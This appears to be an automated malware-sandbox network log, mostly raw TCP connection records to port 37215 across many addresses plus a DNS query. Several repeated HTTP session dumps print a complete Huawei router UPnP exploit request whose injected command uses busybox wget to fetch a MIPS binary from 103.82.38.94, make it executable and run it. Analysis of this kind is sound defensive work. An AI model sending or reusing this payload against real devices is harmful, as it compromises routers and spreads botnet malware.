                                                        Jun 13, 2024 21:32:03.312172890 CEST3858837215192.168.2.1441.211.167.205
                                                        Jun 13, 2024 21:32:03.312274933 CEST3721543552197.213.58.236192.168.2.14
                                                        Jun 13, 2024 21:32:03.312285900 CEST3721553104197.246.186.62192.168.2.14
                                                        Jun 13, 2024 21:32:03.312294960 CEST3721553360197.246.186.62192.168.2.14
                                                        Jun 13, 2024 21:32:03.312316895 CEST4355237215192.168.2.14197.213.58.236
                                                        Jun 13, 2024 21:32:03.312326908 CEST5336037215192.168.2.14197.246.186.62
                                                        Jun 13, 2024 21:32:03.312355995 CEST372154605241.221.133.250192.168.2.14
                                                        Jun 13, 2024 21:32:03.312359095 CEST4355237215192.168.2.14197.213.58.236
                                                        Jun 13, 2024 21:32:03.312365055 CEST5336037215192.168.2.14197.246.186.62
                                                        Jun 13, 2024 21:32:03.312366962 CEST3721558916156.40.255.202192.168.2.14
                                                        Jun 13, 2024 21:32:03.312786102 CEST372154630841.221.133.250192.168.2.14
                                                        Jun 13, 2024 21:32:03.312796116 CEST372155118441.223.127.19192.168.2.14
                                                        Jun 13, 2024 21:32:03.312805891 CEST3721547686197.248.245.187192.168.2.14
                                                        Jun 13, 2024 21:32:03.312817097 CEST372155144041.223.127.19192.168.2.14
                                                        Jun 13, 2024 21:32:03.312824965 CEST4630837215192.168.2.1441.221.133.250
                                                        Jun 13, 2024 21:32:03.312825918 CEST3721542094156.233.152.133192.168.2.14
                                                        Jun 13, 2024 21:32:03.312846899 CEST4630837215192.168.2.1441.221.133.250
                                                        Jun 13, 2024 21:32:03.312846899 CEST5144037215192.168.2.1441.223.127.19
                                                        Jun 13, 2024 21:32:03.312877893 CEST5144037215192.168.2.1441.223.127.19
                                                        Jun 13, 2024 21:32:03.312944889 CEST3721545212156.98.126.146192.168.2.14
                                                        Jun 13, 2024 21:32:03.312957048 CEST3721542350156.233.152.133192.168.2.14
                                                        Jun 13, 2024 21:32:03.312994957 CEST4235037215192.168.2.14156.233.152.133
                                                        Jun 13, 2024 21:32:03.313009024 CEST4235037215192.168.2.14156.233.152.133
                                                        Jun 13, 2024 21:32:03.313105106 CEST3721547708156.199.108.201192.168.2.14
                                                        Jun 13, 2024 21:32:03.313116074 CEST3721547964156.199.108.201192.168.2.14
                                                        Jun 13, 2024 21:32:03.313124895 CEST372154432241.49.50.178192.168.2.14
                                                        Jun 13, 2024 21:32:03.313134909 CEST372155412441.19.210.36192.168.2.14
                                                        Jun 13, 2024 21:32:03.313152075 CEST4796437215192.168.2.14156.199.108.201
                                                        Jun 13, 2024 21:32:03.313196898 CEST4796437215192.168.2.14156.199.108.201
                                                        Jun 13, 2024 21:32:03.313329935 CEST372155438041.19.210.36192.168.2.14
                                                        Jun 13, 2024 21:32:03.313340902 CEST3721542156156.107.211.96192.168.2.14
                                                        Jun 13, 2024 21:32:03.313373089 CEST5438037215192.168.2.1441.19.210.36
                                                        Jun 13, 2024 21:32:03.313397884 CEST5438037215192.168.2.1441.19.210.36
                                                        Jun 13, 2024 21:32:03.313571930 CEST3721552272197.13.47.35192.168.2.14
                                                        Jun 13, 2024 21:32:03.313590050 CEST3721552528197.13.47.35192.168.2.14
                                                        Jun 13, 2024 21:32:03.313599110 CEST3721560028156.25.200.5192.168.2.14
                                                        Jun 13, 2024 21:32:03.313608885 CEST3721536906156.184.236.36192.168.2.14
                                                        Jun 13, 2024 21:32:03.313623905 CEST5252837215192.168.2.14197.13.47.35
                                                        Jun 13, 2024 21:32:03.313644886 CEST5252837215192.168.2.14197.13.47.35
                                                        Jun 13, 2024 21:32:03.313997984 CEST3721560284156.25.200.5192.168.2.14
                                                        Jun 13, 2024 21:32:03.314018965 CEST372153432441.177.114.51192.168.2.14
                                                        Jun 13, 2024 21:32:03.314027071 CEST3721546346156.149.195.24192.168.2.14
                                                        Jun 13, 2024 21:32:03.314034939 CEST6028437215192.168.2.14156.25.200.5
                                                        Jun 13, 2024 21:32:03.314037085 CEST3721550684197.11.150.37192.168.2.14
                                                        Jun 13, 2024 21:32:03.314048052 CEST3721546602156.149.195.24192.168.2.14
                                                        Jun 13, 2024 21:32:03.314066887 CEST6028437215192.168.2.14156.25.200.5
                                                        Jun 13, 2024 21:32:03.314080000 CEST3721559202156.73.112.15192.168.2.14
                                                        Jun 13, 2024 21:32:03.314085007 CEST4660237215192.168.2.14156.149.195.24
                                                        Jun 13, 2024 21:32:03.314116955 CEST4660237215192.168.2.14156.149.195.24
                                                        Jun 13, 2024 21:32:03.314527035 CEST3721560154197.98.113.18192.168.2.14
                                                        Jun 13, 2024 21:32:03.314536095 CEST372156021641.191.40.211192.168.2.14
                                                        Jun 13, 2024 21:32:03.314548016 CEST372156047241.191.40.211192.168.2.14
                                                        Jun 13, 2024 21:32:03.314558029 CEST372153486041.96.239.161192.168.2.14
                                                        Jun 13, 2024 21:32:03.314567089 CEST3721555780156.52.1.101192.168.2.14
                                                        Jun 13, 2024 21:32:03.314584970 CEST6047237215192.168.2.1441.191.40.211
                                                        Jun 13, 2024 21:32:03.314620018 CEST6047237215192.168.2.1441.191.40.211
                                                        Jun 13, 2024 21:32:03.314840078 CEST372153511641.96.239.161192.168.2.14
                                                        Jun 13, 2024 21:32:03.314850092 CEST372155811241.79.41.75192.168.2.14
                                                        Jun 13, 2024 21:32:03.314882040 CEST3511637215192.168.2.1441.96.239.161
                                                        Jun 13, 2024 21:32:03.314909935 CEST3511637215192.168.2.1441.96.239.161
                                                        Jun 13, 2024 21:32:03.314982891 CEST372155261041.228.70.82192.168.2.14
                                                        Jun 13, 2024 21:32:03.314994097 CEST372155836841.79.41.75192.168.2.14
                                                        Jun 13, 2024 21:32:03.315028906 CEST5836837215192.168.2.1441.79.41.75
                                                        Jun 13, 2024 21:32:03.315046072 CEST5836837215192.168.2.1441.79.41.75
                                                        Jun 13, 2024 21:32:03.315242052 CEST3721540000197.146.168.47192.168.2.14
                                                        Jun 13, 2024 21:32:03.315253019 CEST3721533114197.147.57.78192.168.2.14
                                                        Jun 13, 2024 21:32:03.315305948 CEST3721534586197.212.212.239192.168.2.14
                                                        Jun 13, 2024 21:32:03.315318108 CEST3721533370197.147.57.78192.168.2.14
                                                        Jun 13, 2024 21:32:03.315340996 CEST3721536062197.151.164.204192.168.2.14
                                                        Jun 13, 2024 21:32:03.315351963 CEST3721538432197.35.140.134192.168.2.14
                                                        Jun 13, 2024 21:32:03.315355062 CEST3337037215192.168.2.14197.147.57.78
                                                        Jun 13, 2024 21:32:03.315387011 CEST3337037215192.168.2.14197.147.57.78
                                                        Jun 13, 2024 21:32:03.315448999 CEST3721536318197.151.164.204192.168.2.14
                                                        Jun 13, 2024 21:32:03.315490007 CEST3631837215192.168.2.14197.151.164.204
                                                        Jun 13, 2024 21:32:03.315517902 CEST3631837215192.168.2.14197.151.164.204
                                                        Jun 13, 2024 21:32:03.315774918 CEST3721547646156.32.187.77192.168.2.14
                                                        Jun 13, 2024 21:32:03.315785885 CEST3721547902156.32.187.77192.168.2.14
                                                        Jun 13, 2024 21:32:03.315795898 CEST3721556892156.245.123.173192.168.2.14
                                                        Jun 13, 2024 21:32:03.315804958 CEST3721557148156.245.123.173192.168.2.14
                                                        Jun 13, 2024 21:32:03.315826893 CEST3721543654197.194.155.30192.168.2.14
                                                        Jun 13, 2024 21:32:03.315833092 CEST4790237215192.168.2.14156.32.187.77
                                                        Jun 13, 2024 21:32:03.315840960 CEST5714837215192.168.2.14156.245.123.173
                                                        Jun 13, 2024 21:32:03.315856934 CEST4790237215192.168.2.14156.32.187.77
                                                        Jun 13, 2024 21:32:03.315876961 CEST5714837215192.168.2.14156.245.123.173
                                                        Jun 13, 2024 21:32:03.316106081 CEST3721552388197.181.128.207192.168.2.14
                                                        Jun 13, 2024 21:32:03.316117048 CEST3721552644197.181.128.207192.168.2.14
                                                        Jun 13, 2024 21:32:03.316157103 CEST5264437215192.168.2.14197.181.128.207
                                                        Jun 13, 2024 21:32:03.316169977 CEST5264437215192.168.2.14197.181.128.207
                                                        Jun 13, 2024 21:32:03.316338062 CEST372155951041.78.129.83192.168.2.14
                                                        Jun 13, 2024 21:32:03.316349030 CEST372155902241.208.140.157192.168.2.14
                                                        Jun 13, 2024 21:32:03.316359997 CEST372155976641.78.129.83192.168.2.14
                                                        Jun 13, 2024 21:32:03.316379070 CEST372156028241.116.69.21192.168.2.14
                                                        Jun 13, 2024 21:32:03.316426039 CEST5976637215192.168.2.1441.78.129.83
                                                        Jun 13, 2024 21:32:03.316426039 CEST5976637215192.168.2.1441.78.129.83
                                                        Jun 13, 2024 21:32:03.316696882 CEST3721534730197.190.221.106192.168.2.14
                                                        Jun 13, 2024 21:32:03.316708088 CEST372153390041.38.56.45192.168.2.14
                                                        Jun 13, 2024 21:32:03.316718102 CEST3721534986197.190.221.106192.168.2.14
                                                        Jun 13, 2024 21:32:03.316728115 CEST372155636241.220.176.254192.168.2.14
                                                        Jun 13, 2024 21:32:03.316739082 CEST372155661841.220.176.254192.168.2.14
                                                        Jun 13, 2024 21:32:03.316756964 CEST3498637215192.168.2.14197.190.221.106
                                                        Jun 13, 2024 21:32:03.316771030 CEST5661837215192.168.2.1441.220.176.254
                                                        Jun 13, 2024 21:32:03.316788912 CEST3498637215192.168.2.14197.190.221.106
                                                        Jun 13, 2024 21:32:03.316803932 CEST5661837215192.168.2.1441.220.176.254
                                                        Jun 13, 2024 21:32:03.316878080 CEST372155722041.178.85.17192.168.2.14
                                                        Jun 13, 2024 21:32:03.316997051 CEST3721541316156.178.110.31192.168.2.14
                                                        Jun 13, 2024 21:32:03.317007065 CEST372155747441.178.85.17192.168.2.14
                                                        Jun 13, 2024 21:32:03.317015886 CEST3721554130197.205.249.150192.168.2.14
                                                        Jun 13, 2024 21:32:03.317024946 CEST372155113841.73.50.38192.168.2.14
                                                        Jun 13, 2024 21:32:03.317034960 CEST372155139641.73.50.38192.168.2.14
                                                        Jun 13, 2024 21:32:03.317043066 CEST5747437215192.168.2.1441.178.85.17
                                                        Jun 13, 2024 21:32:03.317069054 CEST5139637215192.168.2.1441.73.50.38
                                                        Jun 13, 2024 21:32:03.317069054 CEST5747437215192.168.2.1441.178.85.17
                                                        Jun 13, 2024 21:32:03.317094088 CEST5139637215192.168.2.1441.73.50.38
                                                        Jun 13, 2024 21:32:03.317177057 CEST3721536008197.39.167.206192.168.2.14
                                                        Jun 13, 2024 21:32:03.317382097 CEST3721546502197.32.214.232192.168.2.14
                                                        Jun 13, 2024 21:32:03.317392111 CEST3721546758197.32.214.232192.168.2.14
                                                        Jun 13, 2024 21:32:03.317430019 CEST4675837215192.168.2.14197.32.214.232
                                                        Jun 13, 2024 21:32:03.317476988 CEST3721548198197.200.253.22192.168.2.14
                                                        Jun 13, 2024 21:32:03.317487955 CEST3721539440156.36.62.71192.168.2.14
                                                        Jun 13, 2024 21:32:03.317497015 CEST3721547942197.200.253.22192.168.2.14
                                                        Jun 13, 2024 21:32:03.317502975 CEST4675837215192.168.2.14197.32.214.232
                                                        Jun 13, 2024 21:32:03.317506075 CEST3721555596197.175.74.47192.168.2.14
                                                        Jun 13, 2024 21:32:03.317512989 CEST4819837215192.168.2.14197.200.253.22
                                                        Jun 13, 2024 21:32:03.317527056 CEST3721555852197.175.74.47192.168.2.14
                                                        Jun 13, 2024 21:32:03.317537069 CEST372155596641.193.199.134192.168.2.14
                                                        Jun 13, 2024 21:32:03.317547083 CEST372155622241.193.199.134192.168.2.14
                                                        Jun 13, 2024 21:32:03.317549944 CEST4819837215192.168.2.14197.200.253.22
                                                        Jun 13, 2024 21:32:03.317560911 CEST5585237215192.168.2.14197.175.74.47
                                                        Jun 13, 2024 21:32:03.317579985 CEST5622237215192.168.2.1441.193.199.134
                                                        Jun 13, 2024 21:32:03.317612886 CEST5585237215192.168.2.14197.175.74.47
                                                        Jun 13, 2024 21:32:03.317615032 CEST5622237215192.168.2.1441.193.199.134
                                                        Jun 13, 2024 21:32:03.317656040 CEST3721544814197.152.83.80192.168.2.14
                                                        Jun 13, 2024 21:32:03.317666054 CEST372154503441.183.64.86192.168.2.14
                                                        Jun 13, 2024 21:32:03.317675114 CEST3721545070197.152.83.80192.168.2.14
                                                        Jun 13, 2024 21:32:03.317683935 CEST3721538380197.211.1.204192.168.2.14
                                                        Jun 13, 2024 21:32:03.317693949 CEST372154529041.183.64.86192.168.2.14
                                                        Jun 13, 2024 21:32:03.317713976 CEST4507037215192.168.2.14197.152.83.80
                                                        Jun 13, 2024 21:32:03.317725897 CEST4529037215192.168.2.1441.183.64.86
                                                        Jun 13, 2024 21:32:03.317744970 CEST4507037215192.168.2.14197.152.83.80
                                                        Jun 13, 2024 21:32:03.317756891 CEST4529037215192.168.2.1441.183.64.86
                                                        Jun 13, 2024 21:32:03.317841053 CEST3721555216197.224.168.26192.168.2.14
                                                        Jun 13, 2024 21:32:03.317851067 CEST3721555472197.224.168.26192.168.2.14
                                                        Jun 13, 2024 21:32:03.317871094 CEST372155780841.90.188.92192.168.2.14
                                                        Jun 13, 2024 21:32:03.317878962 CEST3721548262156.85.29.213192.168.2.14
                                                        Jun 13, 2024 21:32:03.317888975 CEST372155806441.90.188.92192.168.2.14
                                                        Jun 13, 2024 21:32:03.317890882 CEST5547237215192.168.2.14197.224.168.26
                                                        Jun 13, 2024 21:32:03.317897081 CEST3721533494197.121.4.160192.168.2.14
                                                        Jun 13, 2024 21:32:03.317904949 CEST5547237215192.168.2.14197.224.168.26
                                                        Jun 13, 2024 21:32:03.317913055 CEST5806437215192.168.2.1441.90.188.92
                                                        Jun 13, 2024 21:32:03.317934990 CEST5806437215192.168.2.1441.90.188.92
                                                        Jun 13, 2024 21:32:03.317971945 CEST3721533750197.121.4.160192.168.2.14
                                                        Jun 13, 2024 21:32:03.317981958 CEST3721537536197.0.87.171192.168.2.14
                                                        Jun 13, 2024 21:32:03.318013906 CEST3375037215192.168.2.14197.121.4.160
                                                        Jun 13, 2024 21:32:03.318028927 CEST3375037215192.168.2.14197.121.4.160
                                                        Jun 13, 2024 21:32:03.318249941 CEST3721537792197.0.87.171192.168.2.14
                                                        Jun 13, 2024 21:32:03.318260908 CEST372155462241.92.153.193192.168.2.14
                                                        Jun 13, 2024 21:32:03.318269968 CEST3721557660197.207.174.181192.168.2.14
                                                        Jun 13, 2024 21:32:03.318279028 CEST372155487841.92.153.193192.168.2.14
                                                        Jun 13, 2024 21:32:03.318288088 CEST372154914841.31.34.212192.168.2.14
                                                        Jun 13, 2024 21:32:03.318298101 CEST372154940441.31.34.212192.168.2.14
                                                        Jun 13, 2024 21:32:03.318299055 CEST3779237215192.168.2.14197.0.87.171
                                                        Jun 13, 2024 21:32:03.318303108 CEST5487837215192.168.2.1441.92.153.193
                                                        Jun 13, 2024 21:32:03.318309069 CEST3721540390197.31.171.82192.168.2.14
                                                        Jun 13, 2024 21:32:03.318316936 CEST3779237215192.168.2.14197.0.87.171
                                                        Jun 13, 2024 21:32:03.318317890 CEST3721540646197.31.171.82192.168.2.14
                                                        Jun 13, 2024 21:32:03.318327904 CEST3721544078156.157.209.9192.168.2.14
                                                        Jun 13, 2024 21:32:03.318331957 CEST4940437215192.168.2.1441.31.34.212
                                                        Jun 13, 2024 21:32:03.318351984 CEST4064637215192.168.2.14197.31.171.82
                                                        Jun 13, 2024 21:32:03.318373919 CEST5487837215192.168.2.1441.92.153.193
                                                        Jun 13, 2024 21:32:03.318380117 CEST4940437215192.168.2.1441.31.34.212
                                                        Jun 13, 2024 21:32:03.318397999 CEST4064637215192.168.2.14197.31.171.82
                                                        Jun 13, 2024 21:32:03.318428993 CEST3721535978156.217.252.15192.168.2.14
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jun 13, 2024 21:34:39.477138996 CEST192.168.2.141.1.1.10xe488Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                                                        Jun 13, 2024 21:34:39.477210045 CEST192.168.2.141.1.1.10x3267Standard query (0)daisy.ubuntu.com28IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jun 13, 2024 21:34:39.500370026 CEST1.1.1.1192.168.2.140xe488No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                                                        Jun 13, 2024 21:34:39.500370026 CEST1.1.1.1192.168.2.140xe488No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.143967641.79.20.24137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.089978933 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1192.168.2.1435226197.117.40.24137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090060949 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2192.168.2.1438996156.168.223.11937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090071917 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3192.168.2.1456444197.133.36.11137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090152025 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4192.168.2.145568441.197.172.24137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.090207100 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
